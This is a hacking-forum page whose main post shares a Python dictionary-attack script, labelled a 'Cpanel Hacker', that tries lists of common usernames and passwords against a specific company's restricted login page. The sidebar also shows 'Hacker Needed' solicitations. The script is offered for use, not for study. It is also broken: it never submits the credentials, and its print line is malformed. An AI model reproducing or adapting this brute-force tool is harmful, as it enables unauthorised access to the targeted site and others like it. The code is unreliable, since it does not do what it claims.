www.i4info.org

Would you like to react to this message? Create an account in a few clicks or log in to continue.
www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2017
hacker - Cpanel Hacker [python] EmptySat Apr 29, 2017 10:50 am by ubedullah

» Group hackers
hacker - Cpanel Hacker [python] EmptySat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptySat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptySat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptyThu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptyTue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptyTue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptyTue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
hacker - Cpanel Hacker [python] EmptyTue Apr 11, 2017 1:35 am by Group Hackers

May 2024

MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter


    Cpanel Hacker [python]

    Admin
    Admin
    Admin


    Posts : 474
    Reputation : 8
    Join date : 2014-12-10
    Age : 31
    Location : Pakistan

    hacker - Cpanel Hacker [python] Empty Cpanel Hacker [python]

    Post by Admin Wed Mar 04, 2015 2:13 pm

    Code:
    [color=#EEEEEE][size=16]#!Script used to dictionary attack login, widely available on the net, unknown author!

    import urllib2

    users = ("admin", "administrator", "Admin", "Administrator", "admin123", "administrator123", "Admin123", "Administrator123", "User123", "user123", "Support", "support", "server", "root", "manager", "Manager", "Scanner", "Scanner", "SysAdmin", "sysAdmin", "Sysadmin", "sysadmin", "Sysadministrator", "sysadministrator1", "sysadministrator", "user1", "User1", "User2", "user2", "User3", "user3", "SuperUser", "superUser", "Superuser", "SuperUser1", "SuperAdmin1", "Sheffield1", "sheffield1", "Sheffield01", "sheffield01")

    passwords = ("admin", "administrator", "Admin", "Administrator", "jessica", "Jesica", "John", "john", "Root", "root", "Support", "support", "Support1", "support1", "User1", "user1", "User2", "user2", "User3", "user3", "Password", "password", "P@ssW0rd", "p@ssW0rd", "PassW0rd", "passW0rd", "P@$$W0rd", "p@$$W0rd", "P@$$word", "p@$$word", "UserAdmin", "useradmin", "userAdmin", "useradministrator", "UserAdministrator", "AdminUser", "adminUser", "adminuser", "Manaer1", "manager1", "Manager01", "manager01", "Admin01", "admin01", "Administrator01", "administrator01", "Sheffield1", "sheffield1", "Sheffield01", "Sheffield01")

    for user in users:

    for password in passwords:

    url = "http://www.sheffieldtilecompany.co.uk/restricted/login.php"

    req = urllib2.Request(url)

    req.add_header("Cookie", "PHPSESSID=enter cookieid here;security=low")

    response = urllib2.urlopen(req)

    html = response.read()

    if "failed to login" not in html:

    print "Working combination --- %s : %s" (user, password)
    [/size][/color]

      Current date/time is Thu May 09, 2024 11:22 pm